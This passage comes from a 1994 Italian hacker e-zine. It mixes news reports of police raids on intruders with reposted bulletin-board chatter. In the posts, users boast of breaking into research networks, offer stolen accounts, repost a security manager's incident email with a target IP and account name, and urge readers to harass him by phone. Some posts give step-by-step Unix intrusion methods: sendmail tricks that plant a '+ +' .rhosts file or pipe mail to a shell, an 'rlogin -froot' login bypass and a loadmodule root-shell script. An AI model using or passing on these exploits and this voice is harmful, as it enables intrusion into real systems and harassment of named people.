viaggio telematico, potenzialmente in tutto il mondo, a spese
delle aziende danneggiate.
In Italia gli hacker sono attivi da anni, tanto da essere fra
i piu' abili del mondo, ma scoprirli e' difficilissimo. Finora
il caso piu' eclatante e' stato, due anni fa, la truffa ai danni
del servizio Videotel della Sip. Con l'operazione portata a
termine oggi dalla Criminalpol a Roma, Milano e Napoli la vita
dei pirati informatici diventa invece piu' difficile. I circa 40
hacker inquisiti sono stati ''pedinati via cavo'' giorno e notte
per tre mesi, grazie a un sistema unico in Europa messo a punto
dall'Ufficio della Criminalpol per i crimini informatici.
Dopo avere individuato il primo hacker, quello che ha
disattivato la banca dati sui trapianti del Policlinico
di Roma, la Criminalpol ha preferito non
bloccarlo subito, ma seguirlo lungo le reti informatiche per
risalire ai suoi ''colleghi''. E' riuscita a farlo dando
all'hacker l'illusione di penetrare nella banca dati del
Policlinico, mentre veniva indirizzato dalla polizia in una
copia del sistema. In questo modo l'hacker continuava ad agire
senza fare danni, mentre la polizia ne seguiva le mosse in un
computer gemello di quello usato dall'hacker, collegato alla
rete telefonica, che sul terminale della polizia mostrava tutte
le operazioni del computer pirata. ''Solo un metodo cosi'
sofisticato poteva smascherare hacker tanto abili'', ha
commentato il direttore centrale dell'Istituto per la sicurezza
informatica (Istinform), Fulvio Berghella, che ha collaborato
con la Criminalpol. ''Sono stati molto furbi - ha aggiunto -
perche' riuscivano a penetrare indisturbati nei computer
'mascherandosi' in modo da sfuggire ad ogni controllo''. Piu'
abili del protagonista del film ''Wargame'', gli hacker
viaggiavano sulle reti informatiche di tutto il mondo,
dall'Estremo Oriente al Nord America, usando programmi in grado
di ''mimetizzarsi'' con il sistema dei computer nei quali
penetravano, tanto da diventare praticamente invisibili ai
controlli. (ANSA).
---------------------------------------
Mitt XXX
Data 22/07/94 16:01:01
Msg_XXXX Object: non esageriamo
le cazzate via e-mail si scrivono ovunque, ma li dentro gente con le
palle c'e' eccome... tramite i tanti dell'enea e' possibile accedere
direttamente al cern e pare all'acceleratore di particelle in remoto,
se e' vero che sono tutti collegati sarebbe un bel colpo avere accesso
a tutti i sincrotroni della terra, fino a poco tempo fa mezzo pianeta
aveva accesso ai vax del cern ma pare nessuno sia riuscito a cavarne
nulla, in giro ho anche letto che sta per partire una spedizione in
antartide (enea) ed e' stato creato un network custom per tenere i
contatti.. il net e' collegato a inet via SAT
ho gia' tutte le info.. per ora i collegamenti sono instabili ma presto
sara' ok(o forse lo e' gia').. sara' il amssimo hackerare la.. di cose
da farece ne sono parecchie, peccatoche la maggior partedella gente
pensa che l'hacking sia la ricerca dinuovi pad X fare i fighi su qsd..
ah la diffusione di E-mail privata e' un reato motlo serio, spiegatemi
ildivertimento a leggere i messy privati di una coppia.. e come mettersi
a spiare uan ragazza che si spoglia con ilbinocolo.... penoso
Area XXX
Mitt XXXXX/XX
Data 23/07/94 01:55:51
Msg_XXXX 1/3 Object:enea
ke vuoi accessi x l'enea?
kuanti?
ripeto, x me all'enea sono TUTTI degli emeriti koglioni, l;trimenti mi
avrebbero gia bekkato da 3 anni e invece sto sempre li'? kuindi di cert
furbi non lo sono.
poi ke facciano i links del kazzo ke vogliono, non me ne fotte nulla,
io sfondo x sfodare una societa e basta, non me ne frega un kazzo delle
particelle di biotomi dell'uccello dell'operatore.
Non ti diverti a kallare ksd dal botswana te? pekkato io si. senno si
skannan sempre gli stessi paesi le stesse societa'
e ci si rompe proprio il kazzo kredimi.
il cern via decnet e' ovviamente linkato all'enea xke anke l'enea sta in
decnet globale, non tutto ma molti vax si.
komunkue il cern e' linkato a tutto, non e' il kaso di usare gli accounst
dei lamers ke giravano sul cern e ke girano da sempre x avere accesso ai
diski del cern stesso.
I links piu grandi kon l'italia, a kaunto ho visto, il cern li ha kon
l'Infn, altri granmdissimi koglioni.
Una kosa: nessuno skannando x.25/inet/decnet ha mai bekkato il vax di
kontrollo del gran sasso? cioe...
di un koso (non rikorod kosa) ke han messo sotto o dentreo il gran sasso,
un vax 4000 mi pare.. xke io ho un account full privs la, ma mi son xso
l'indir decnet e inet, kuello x.25 ce l'ho xo' e in Na al momento.
grazie
Mitt Xxx
Data 23/07/94 14:44:34
Msg_XXXX 1/1 Object: ENEA
li stimo e continuero' a stimarli per quello che fanno, io non sono
maistato buttato fuori da niente se e' per questo ma non e' perche'
glioperatorisono coglioni, semplicemente minascondo bene..
infn confermo, addirittura su un sunos mi sono cuccato il filesistem
montato in remoto diun server del cern, robetta da iente comunque..
il net del gran sasso e' infn, ti ricordi il nome del vax? ildomain
e' gs.infn.it a memoria, ci sono entrato ultimamente X il cisco,
sofndabile ma niente x.25. se entri non cancellarmi i log
---------------------------------------
Corriere della Sera 03 Agosto 1994
---------------------------------------------------------------------------
Denunciati 5 giovani: Hanno fatto pagare salate bollette Sip a una societa'
di comunicazioni
I PIRATI TRADITI DA SAMANTHA
Il collegamento con la linea erotica smaschera i truffatori col computer
--------------------------------------------------------------------------
A cura di Ice MC
Da quasi un anno la bolletta Sip per i collegamenti via computer sembrava
impazzita. c'erano delle spese per i servizi erotici di Samantha, una di
quelle messagerie su cui gli appassionati si scatenano con le fantasie piu'
turpi. Poi sono arrivati i costi per la consultazione delle banche dati di
anziende aerospaziali e uffici federali americani. Dalla corte di cassazione
di roma, e le cifre astronomiche per i collegamenti con la rete telefonica
cinese.
Tutto questo era a capo di una societa' specializzata in telecomnucazioni.
Per un po' la ditta ha pagato: fino a 150 milioni a bimestre. Ma tre mesi
fa i manager si sono decisi a presentare una denuncia alla Digos ed e'
comincita la prima indagine computerizzata mai messa a segno a Milano.
Gli investigatori non hanno fatto pedinamenti, ma hanno trascorso intere
settimane al loro computer per intercettare le connessioni illegali. Alla
fine cinque giovani pirati informatici sono stati denunciati per frode
informatica: due reati entrati a far parte del codice penale soltanto
l'anno scorso.
Dei cinque, tre sono di Milano: Fabio P., 25 anni, autista di camion con
la grande passione per i computer, Maurizio O., 21, studente di Scienze
politiche, Luca R., 22, anche lui studente universitario. Gli altri due
invece sono Massimiliano L., 25 anni, tecnico in un'azienda a Roma dove
abita, e Andrea S., 17 anni, studente, di Siracusa.
I cinque non si conoscevano. Da una banca dati pirata avevano saputo il
codcie segreto della societa' di telecommunicazioni milanese che, per le
sue necessita' di lavoro, era collegata al servizio Itapac, la rete
informatica della Sip. Il codice segreto e' il numero di identificazione
con cui la Sip riconosce l'abbonato e gli addebita gli scatti. E proprio
avendo quel numero, con le loro tastiere, i cinque pirati si sono inseriti
nella rete Itapac. Per due mesi gli agenti, diretti dal vicequestore Dino
Finolli, hanno seguito sui loo video le loro scorribande informatiche:
un lavoro simile alle intercettazioni telefoniche. I tre ragazzi di Milano
e il collega di Siracusa sono stati subito irintracciati, perche'
utilizzavano la linea telefonica di casa. Piu' difficile invece risalire
al tecnico di Roma, che si serviva del computer dell'azienda dove lavora.
I poliziotti dovevano identificarlo tra decine di dipendenti. Ma non hanno
fatto fatica: Massimiliano L. si collegava quasi sempre alla messageria
erotica di Samantha. Una ragazza della Digos lo ha convinto, via computer,
a rivelare il numero di telefono promettendogli qualcosa di vermente sexi.
Gli investigatori hanno cosi' rintracciato l'azienda. E verso le 11
dell'altra mattina una squadra, inviata a Roma, lo ha sorpreso con il
computer ancora acceso.
Fabrizio Gatti
[N.d.R.: Allora.. come al solito la Digos fa' cilecca.. o per lo meno..
becca solo i + Lame..hehe ...
In sostanza.. volete fare sesso al vdt?.. beh..fatevi dare il suo
di numero.. =:-P Ice MC ]
[N.d.R.: Voci di corridoio parlano di altri 20 fermi nella zona di Milano
ma prendetela colle pinze, potrebbero essere solo stronzate. Del
resto l'avete letto alcune "stronzate" piu' sopra :)
Sul prossimo numero di TBP intervisteremo, se ci riuscira' di
contattarli, i diretti interessati :O ]
---------------------------------------
SOMETHING FROM SECTEC BBS
-------------------------
Msg #1018 Wednesday, June 22, 1994 03:15 CET
From: Nexus.6%bbs@sectec.greenie.muc.de (Nexus 6)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: lamers!
I left mesages on this bbs about a system, a military systen and here
it is from cert ... so there is someone here that is really a lamer
and he works for CERT so keep your eyes reallo open! here you are the
txt
From bin Mon Jun 13 01:38 EDT 1994Received: from tymix.tymnet.com by
hp.hq.dla.mil (16.6/1.34) id AA02086; Mon, 13 Jun 94 01:38:50
-0400Received: by tymix.Tymnet.COM (4.1/SMI-4.1) id AA25206;
Sun, 12 Jun 94 22:40:48 PDTReceived: from druid by
tymix.Tymnet.COM (in.smtpd); 12 Jun 94 22:40:48 PDTReceived: by
druid.Tymnet.COM (4.1/SMI-4.1) id AA25144; Sun, 12 Jun 94
22:39:32 PDTDate: Sun, 12 Jun 94 22:39:32 PDTFrom: ddrew@Tymnet.COM
(Dale Drew)Message-Id: <9406130539.AA25144@druid.Tymnet.COM>To:
cert@cert.org, ddrew@Tymnet.COM, nsd@druid.Tymnet.COM,
postmaster@hp.hq.dla.mil, root@hp.hq.dla.milSubject: Possible
IncidentTo whom it may concern:My name is Dale Drew, and I am the
manager of the Data Systems Security Department here at MCI.During a
recent data investigation, our department identified a computermessage
left on a Bulletin Board System, left by a computer "hacker".The
computer hacker left a message to all members of the BBS that
includedan account name and password that could apparently be used to
access your computer system. The hacker also indicates that he has
access to other accounts to other systems at your site, but did not
provide additionaldetails to the extent of that apparent access.The
system IP number is: 131.62.0.2, and the account name is "fho0337".
Apassword was left as well, but I will not transmitt it over e-mail,
nor theactual BBS message itself, unless otherwise permitted by your
site to do so.We do not know the validity of the BBS message, I am
merely passing it alongas an FYI. Additional information about this
incident can be obtained bycontacting me directly. Information about
the poster of the message is alsoavailable.Best regards,
"SUCCESS THROUGH TEAMWORK"
=========================================================================
Dale Drew MCI
Telecommunications Manager
Data Systems Integrity Voice: (408) 922-6526
Internet: ddrew@Tymnet.COM Fax : (408) 922-8870
MCIMAIL: Dale_Drew/644-3335 #
Msg #1025 Friday, June 24, 1994 11:46 CET
From: The.Aky%bbs@sectec.greenie.muc.de (The Aky)
Subject: Re: lamers!
>so should we keep our H/P-info by ourselves? If some asshole is really
doing
>that shit above, he could get our ass' burned....
hmmm.. or he could get HIS ass burned.. hmm look this
>> Data Systems Integrity Voice: (408) 922-6526
>> Internet: ddrew@Tymnet.COM Fax : (408) 922-8870
>> MCIMAIL: Dale_Drew/644-3335 #
call these numbers :P
Msg #1035 Monday, July 4, 1994 01:28 CET
From: Ceasar.Thecat%bbs@sectec.greenie.muc.de (Ceasar Thecat)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: WHY PAY FULL PRICE FOR A LONG DISTANCE CALL FROM EUROPE ?
If you have to call home or business in US, Canada or any other country
(outside EC) stop paying the full price. From now on you can benefit of
the US cheap prices with the Call-back service. You just have to call
their computer in Houston (this is free), it calls you back and gives
you a dial tone. This works for voice as well as for faxes and modem
communications. NO MINIMUM, you pay for what you really use NO ENTRY
FEES, they set the service frely for you.
MONTHLY DETAILED BILL in US dollars, pay with your credit card
possible destinations list and detailed prices available on request
contact Nicolas Laurance (33-1) 40.61.03.51
---
Hey do you smell what I am smelling? he.. Equip yourself with an
Omega.exe
and go and break that shit. It is tool-free from Europe . America
online universal tool free number, should be breakable. Call the guy
and find the number.
Ceasar
Msg #201 Saturday, June 25, 1994 09:19 CET
From: Dark.Side%bbs@sectec.greenie.muc.de (Dark Side)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: inet sites
hello...
dunno if it was asked, but here are some interesting sites... (ftp)
uranus.ifi.unit.no/pub/Version_1.6_prerel_1/Demo_filer/
192.31.181.1
128.184.1.1 /UniOn-students/incoming/" "
most are pc/amiga/mac/etc...
check me if you need more...
post others if you got them!
Subject: Re: IRC
some irc servers:
irc.mit.edu
polaris.ctr.columbia.edu
csz.bu.edu
irc-2.mit.edu
and a buncha others.
Msg #210 Thursday, July 7, 1994 02:13 CET
From: The.Aky%bbs@sectec.greenie.muc.de (The Aky)
Subject: Re: IRC
yeah...
harp.aix.calpoly.edu
copper.ucs.indiana.edu
poe.acc.Virginia.EDU
irc.iastate.edu
irc.technion.ac.il
hermes.oc.com
Boston.MA.US.UnderNet.ORG
...etc...
i am thinking to make a list of most known servers... post them :)
Aky
Msg #1005 Sunday, June 12, 1994 17:11 CET
From: Elmar.Bartel%bbs@sectec.greenie.muc.de (Elmar Bartel)
Subject: Re: SMTP BUG
Techno.Music%bbs@sectec.greenie.muc.de (Techno Music) writes:
> about the smtp bug of the sun os unix,to discover if this bug is patched i
> ive the instruction vrfy decode.
> when the system give this message: user unknown
> the bug is patched,but is possible that the system answer the user exist and
> the bug is patched too?
> this couse i found a system that say the user exist but i can't use the
> bug...
The decode doesn't have anything to do with a smtp bug. It is simply an
alias which pipes mail to uudecode. Use a 'from: bin' and make up a uuencoded
file '/bin/.rhosts' which contains one single line '+ +'. Well, you guess
what this does... :) 'from: bin' and 'to: decode' will uudecode your message
to /bin/.rhosts et voila. There we go. I don't have to tell you what to
do with an '+ +' .rhosts, do I? :)
The smtp bug is about something completely different. When bouncing mail
all but the latest versions of sendmail will set a flag, which forces the
mail to be sent, even if this meant mailing it to a program. Thus, use
something like 'from: /usr/ucb/tail|/bin/sh', 'to: bin'. Create a header
which will cause the mail to bounce, e. g. 'Return-Receipt-To: |nowhere'.
Then make the last ten (including the line with the '.') a shell script,
e. g. make the last lines of your mail body something along the lines of
---- cut here ----
#!/bin/sh
echo HELLO THERE >/tmp/test
#
#
# These comments pad the message to a length of ten lines
#
#
#
#
---- cut here ----
What happens when your mail is being delivered? It will bounce, and
it will be returned to '/usr/ucb/tail|/bin/sh'. 'tail' keeps only the
last ten lines of your mail and pipes it to /bin/sh. Get the point? :)
-Elmar
Msg #94 Saturday, June 11, 1994 02:17 CET
From: Davex.Davex%bbs@sectec.greenie.muc.de (Davex Davex)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: newz
Some Quotes from Mobile & Cellular.. UK trade Mag.
Re-chipping Ban.
~~~~~~~~~~~~~~~
BABT approval on new TACS cellphones will in future include a clause
which invalidates the approval if a phone's ESN is altered. The move
follows industry-wide discussions between BABT and Oftel, the networks,
manufacturers,
dealers and the FCS Cellular Service Providers Group. Peter Edwards of the
FCS group said: "ESN re-chipping continues to fuel the rise in mobile phone
theft and is costing our members millions of pounds every year in stolen
airtime and time-consuming administration. The public should now realise
that
if the serial numbers (ESNs) are changed they cannot be connected to the
network and are therefore valueless."
****************************
Tell me about it!! Does this mean more fones to phreak with??
Australia
~~~~~~~~~
GSM went live in Australia on May 20th after two months of trials.
The Optus GSM network, which will be available in all Australian capitals by
Christmas, uses infrastructure by Nortel Matra Cellular.
****************************
More newz as it comez in....DaveX
Msg #1099 Thursday, August 11, 1994 14:44 CET
From: Jerome.X%bbs@sectec.greenie.muc.de (Jerome X)
Subject: Re: Linux
Nexus.6%bbs@sectec.greenie.muc.de (Nexus 6) writes:
> Doen anybody know some bugs on linux?!
the -froot bug maybe.....
at the loginprompt just enter -f root or -froot or sumthing .....
heard of it, but I never found a site with this bug...
the same bugcould be abug in AIX machines
J-X
Msg #1101 Thursday, August 11, 1994 23:24 CET
From: Elmar.Bartel%bbs@sectec.greenie.muc.de (Elmar Bartel)
Subject: Re: loadmodule
Maxwell.Benneth%bbs@sectec.greenie.muc.de (Maxwell Benneth) writes:
> Anyone played with /usr/openwin/loadmodule on 4.1.3.1U ?
>
Maxwell Benneth! Still around. :)
loadmodule executes scripts with a uid of 0. cannot remember where those
are located. try 'loadmodule x x'. it will complain that it cannot find
the kernel module 'x'. then replace the first 'x' with a valid device,
i use the 'evq' device. the second 'x' stands for a shell script. thus
loadmodule will complain it cannot find the script and give you the full
path. then use the corresponding 'evq' script. 'cat' it and you'll see that
there is a 'chmod' in there (used to chmod the device node created by
mknod) which doesn't have a full path like '/bin/chmod'. since this script
is executed with root privileges just write your own chmod and set your
path to '.'
> Doen anybody know some bugs on linux?!
try a 'rlogin [machine] -l -froot'. in many versions the username '-froot'
will be passed to the login program by the daemon and login will accept
this to be the '-f' flag with the argument 'root'. only '-f root' should
be accepted here. also works on many AIXes. how embarassing. :)
-Elmar
Msg #1114 Monday, August 15, 1994 02:43 CET
From: Phantom.Lord%bbs@sectec.greenie.muc.de (Phantom Lord)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: loadmodule
Here's script that exploits loadmodule on SunOSes ....
set path = ( . $path )
cat > ld << EOF
/bin/sh
EOF
chmod a+x ld
loadmodule sd.o evqload
Msg #1125 Tuesday, August 23, 1994 21:47 CET
From: Bayern.Power%bbs@sectec.greenie.muc.de (Bayern Power)
Subject: Re: sam
Techno.Music%bbs@sectec.greenie.muc.de (Techno Music) writes:
> Cyber.1%bbs@sectec.greenie.muc.de (Cyber 1) writes:
>
> > The italian SAMANTHA chat system has been busted by italian police.
> > bye
> samantha didn't was an hacking system...so why did they bust it?
FidoNet boards are legal as well and have been busted anyway - in Italy,
logic doesn't count!
[N.d.R. AAAAHAHAHAHAHAHAHHHAHAHAHHAHAHAHAH SCSI ha sempre ragione :) ]
Msg #233 Sunday, August 28, 1994 18:51 CET
From: The.Aky%bbs@sectec.greenie.muc.de (The Aky)
Subject: Re: IRC
>I need a workin dialin with an IRC-account ...! Yes , only for IRC..
iftp irc client from cs.bu.edu and there you go...
s
Msg #234 Monday, August 29, 1994 08:48 CET
From: Massimo.Baga%bbs@sectec.greenie.muc.de (Massimo Baga)
Subject: Re: IRC
Ganja.Man%bbs@sectec.greenie.muc.de (Ganja Man) writes:
u should check for +1 515 945 7000.
it provides u free telnet access and IRC .
Cheers,
Massimo
Msg #29 Monday, August 8, 1994 21:18 CET
From: Speed.Demon%bbs@sectec.greenie.muc.de (Speed Demon)
To: All%bbs@sectec.greenie.muc.de (All)
Subject: fsp site
Decent FSP site.
Physical Plant #5 128.206.29.11 12321
Pc and Mac wares
============================================================================
Beh, fine delle stronzate. Speriamo che vi siano piaciute !!!
+++ATH
j)(/kjk=#
OK
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - THE END
COMMIATO
========
Bene, questa e' proprio la fine. Speriamo che questa strana rivista vi
sia piaciuta. E' solo un tentativo di tirare fuori qualcosa di buono, dal no-
stro paese, che finora sembra solo popolato da stronzi :) vabbe' va, in ogni
caso prendetela per com'e', e NON ROMPETECI I COGLIONI dicendo cazzate, che e'
lamer, che fa schifo, perche' a noi cosi' va bene.
E POI, CAZZO !!! Ho cercato per MESI dei collaboratori, e voi, SI, VOI,
STRONZACCI, mi avete detto "ma se scrivo solo io allora non se ne fa niente"
oppure "ma io non voglio sputtanare quello che so" e cazzate del genere. SI,
CAZZATE, perche' basta un po' di fantasia per tirare fuori cose interessanti.
Questo numero, almeno credo, non ha niente di illecito al suo interno. Contie-
ne dati prelevati da BBS e CHAT di vario tipo, chiunque puo' andare li' e
prenderseli. Ma rappresenta piu' che altro un nostro ESPERIMENTO, per vedere
se dopo aver letto ste cazzate qualcuno si decidera' ad aiutarci.
Molti avrebbero prima di tutto voluto vedere di che si trattava per poi
decidere se collaborare o no. Bene, adesso l'avete visto. Questa magazine e'
aperta a ogni tipo di cosa che riguardi il ns mondo telematico. Quindi, fatevi
sotto !!! Se avete intenzione di collaborare, di mandarci dei vs articoli, di
farci delle domande, di esprimere le vs opinioni sulla rivista, o per darci
dei suggerimenti, o anche semplicemente per INSULTARCI, beh, scrivete agli in-
dirizzi EMAIL sotto-riportati. FATELO !!! E SUBITO !!! :)
============================================================================
H THE BLACK PAGE - Numero 0 - Settembre 1994 - INDIRIZZI EMAIL VALIDI : H
============================================================================
H H \ / T H
H Internet : ay146@freenet.hsc.colorado.edu H ___\__/\---/--- F E H
H H _____\/\-/----- I L H
H Cybernet : 65:1200/1 DECODER BBS H ______//------- G E H
H Scrivere a "Dupree's Paradise" H _____//\-\----- H C H
H H / \ T O H
H QSD : Mailbox "DUPREES PARADISE" H / \ M H
H H H
H Videotel : Arkimede *52181# H TELECOM H
H NUA 2551604400 H SE LA CONOSCI H
H Lasciare CPE all'user "DUPREE'S" H LA EVITI H
H H H
============================================================================
THE BLACK PAGE - In questo numero hanno collaborato :
-----------------------------------------------------
Dupree's Paradise - Redattore capo
Ice MC - Redattore quasi capo anche lui :)
Ace - Corrispondente dagli Esteri :)
Hitman Italy - The K00l Unix guy ;)
Si ringrazia tacitamente Sxs per la "Mucca che caga" di IRC
-----------------------------------------------------------
Si ringraziano i seguenti esseri, reali o virtuali :
----------------------------------------------------
Ace
Hitman Italy
I Vax Brothers
Lo staff di Arkimede
SevenUp e tutti quanti su SECTEC BBS
Black Jack
Agora' Telematica
Gomma, Luc Pac e tutto lo staff di Decoder BBS
Lo staff di One Man Crew
Per qualsiasi messaggio utilizzate la seguente chiave PGP 2.3a :
================================================================
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi4ineEAAAEEAKT5tLs4cMmniPjJE1Xv0D0/sbxTKPCY+f60c7px/xXUDObv
47fnFscT7lOZ7TeCJVo8m7qfj6HqiqSLuRMTNeAEcTUvUYoa7I+mNceL3rVgkqid
qf3RP0av7AFCfICSnzzA/KD3M73I0SBeAt3Mple6EeJ0C7sA+o2626Mw2H/BAAUR
tNdEdXByZWUncyBQYXJhZGlzZSA8UVNEIE1ieCA6ICJEVVBSRUVTIFBBUkFESVNF
Ij4gICAgIDxGaWRvbmV0IDI6MzMxLzM2OT4gICAgICAgIDxheTE0NkBGcmVlbmV0
LkhzYy5Db2xvcmFkby5FZHU+ICAgICAgICAgICAgICAgICAgICAgPEN5YmVybmV0
IDY1OjEyMDAvMT4gICAgICAgPER1cHJlZSdzLlBhcmFkaXNlJWJic0BTZWN0ZWMu
R3JlZW5pZS5NdWMuRGU+ICAgICAgICA6KYkAlQIFEC4in4nJtVamMFAlIQEBFu8E
AKLEfKdOjF+rV5gBg1/KFQ//CHsfYS4FNd3qvbRx6PEUIy3NJ4+YSpGAsPgxNyGg
gVv7QEHHeDlRwgrSkVvM2AaIwYWxZqs2/X09Igy2QowpfTduVppN0mzGyb2/ug5k
PyYA/rsriHxmciMjAUjcptv+7WYVx73q7PmbSTUzYjQA
=pvb/
-----END PGP PUBLIC KEY BLOCK-----
@BEGIN FILE_ID.DIZ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ɼ * Dupree's Paradise * & -IceMC- Ȼ
ÇÄÄÄÄÄÄÄÄÄÄpÄrÄeÄsÄeÄnÄtÄsÄÄÄÄÄÄÄÄÄĶ
º The First Italian ------------=== º
º ===----------- Cyberpunk Magazine º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
ÇÄ The Black Page Ķ
º* Issue 00 - September 1994 *º
ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
º La 1a rivista telematica ITALIANA º
º di CYBERPUNK e CONTROINFORMAZIONE º
º - The Black Page - º
º - Numero 00 -- Settembre 1994 - º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
@END FILE_ID.DIZ
=================================NO CARRIER=================================